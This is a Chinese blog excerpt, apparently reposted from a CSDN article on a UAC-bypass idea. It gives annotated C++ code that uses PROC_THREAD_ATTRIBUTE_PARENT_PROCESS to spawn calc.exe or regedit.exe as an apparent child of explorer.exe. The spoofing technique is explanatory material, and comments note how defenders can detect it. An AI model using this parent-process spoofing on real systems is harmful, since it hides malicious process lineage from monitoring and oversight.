按照 MSDN 的介绍，如果 CreateProcessAsUser 的 dwCreationFlags 参数被设置为 EXTENDED_STARTUPINFO_PRESENT，就表示使用带扩展启动信息的结构体，此时 lpStartupInfo 参数需要填好 STARTUPINFOEX 结构，这个结构由 STARTUPINFO 结构和 PROC_THREAD_ATTRIBUTE_LIST 指针构成:
/* Extended startup information consumed by CreateProcessAsUser when
 * dwCreationFlags contains EXTENDED_STARTUPINFO_PRESENT: the ordinary
 * STARTUPINFO followed by a pointer to an attribute list that is built
 * with InitializeProcThreadAttributeList / UpdateProcThreadAttribute. */
typedef struct _STARTUPINFOEX {
STARTUPINFO StartupInfo;                      /* StartupInfo.cb is set to sizeof(STARTUPINFOEX) by the caller */
PPROC_THREAD_ATTRIBUTE_LIST lpAttributeList;  /* attribute list from InitializeProcThreadAttributeList */
} STARTUPINFOEX, *LPSTARTUPINFOEX;
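DWORD pid = 0;
/* Resolve the PID of the process that will be reported as the child's parent
 * (GetProcessIdByName is a helper defined elsewhere in this file). */
GetProcessIdByName(L"explorer.exe", &pid);
/* Open explorer.exe with full access, as in the original listing. */
HANDLE handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
cout << "PID:" << pid << endl << "Handle:" << handle << endl;

/* Everything that must be released at the end is declared up front so that the
 * early 'break's below all reach the single cleanup path after the do-block. */
char *temp = NULL;
LPPROC_THREAD_ATTRIBUTE_LIST AttributeList = NULL;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));

do
{
    /* The original never checked this; a NULL handle would otherwise be handed
     * to UpdateProcThreadAttribute and only surface as a CreateProcess failure. */
    if (handle == NULL)
    {
        cout << "Error code:" << GetLastError() << endl;
        break;
    }

    /* Extended startup-info block (typo STARTUPOINFOEXA fixed). cb must cover the
     * whole STARTUPINFOEX because EXTENDED_STARTUPINFO_PRESENT is passed below. */
    STARTUPINFOEXA si;
    ZeroMemory(&si, sizeof(si));
    si.StartupInfo.cb = sizeof(si);

    /* Two-call protocol: the first call with a NULL list is expected to fail and
     * only reports the required buffer size in lpsize. */
    SIZE_T lpsize = 0;
    InitializeProcThreadAttributeList(NULL, 1, 0, &lpsize);
    temp = new char[lpsize];
    AttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)temp;
    /* Second call actually initializes the list inside the buffer. */
    if (!InitializeProcThreadAttributeList(AttributeList, 1, 0, &lpsize))
    {
        cout << "Error code:" << GetLastError() << endl;
        AttributeList = NULL;   /* not initialized, so nothing to delete later */
        break;
    }

    /* Set PROC_THREAD_ATTRIBUTE_PARENT_PROCESS so the new process is created as a
     * child of 'handle' (explorer.exe) rather than of the calling process. The
     * original line was not a valid call; the API is UpdateProcThreadAttribute.
     * Note for defenders: the actual creator and the reported parent differ here,
     * which is the discrepancy process-creation telemetry can compare against. */
    if (!UpdateProcThreadAttribute(AttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                                   &handle, sizeof(HANDLE), NULL, NULL))
    {
        cout << "Fail to update attributes" << endl;
        break;
    }
    /* Hand the list to the startup-info block; ownership stays with this code. */
    si.lpAttributeList = AttributeList;

    /* CreateProcess* functions may modify lpCommandLine in place, so it must be a
     * writable buffer rather than a string literal. */
    BOOL started = FALSE;
# ifdef ADMIN
    /* The token to run as is left unset here, exactly as in the original; the
     * caller is responsible for providing a valid one. OpenProcessAsUserA does not
     * exist, the intended API is CreateProcessAsUserA. */
    HANDLE Token = NULL;
    char cmdline[] = "regedit.exe";
    started = CreateProcessAsUserA(Token, NULL, cmdline, NULL, NULL, FALSE,
                                   EXTENDED_STARTUPINFO_PRESENT, NULL, NULL,
                                   (LPSTARTUPINFOA)&si, &pi);
# else
    char cmdline[] = "calc.exe";
    started = CreateProcessAsUserA(NULL, NULL, cmdline, NULL, NULL, FALSE,
                                   EXTENDED_STARTUPINFO_PRESENT, NULL, NULL,
                                   (LPSTARTUPINFOA)&si, &pi);
# endif
    if (started)
    {
        cout << "Process started" << endl;
        /* CreateProcessAsUser returns handles the caller owns; the original leaked them. */
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
    else
    {
        cout << "Error code:" << GetLastError() << endl;
    }
} while (0);

/* Cleanup: delete the attribute list before freeing its backing memory, and use
 * delete[] because the buffer came from new[] (the original used plain delete). */
if (AttributeList != NULL)
{
    DeleteProcThreadAttributeList(AttributeList);
}
delete[] temp;
if (handle != NULL)
{
    CloseHandle(handle);
}
// Source article: "关于父进程和子进程的关系(UAC 绕过思路)" (on the parent/child process relationship, a UAC-bypass idea).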
原文:http://blog.csdn.net/l_f0rm4t3d/article/details/25567463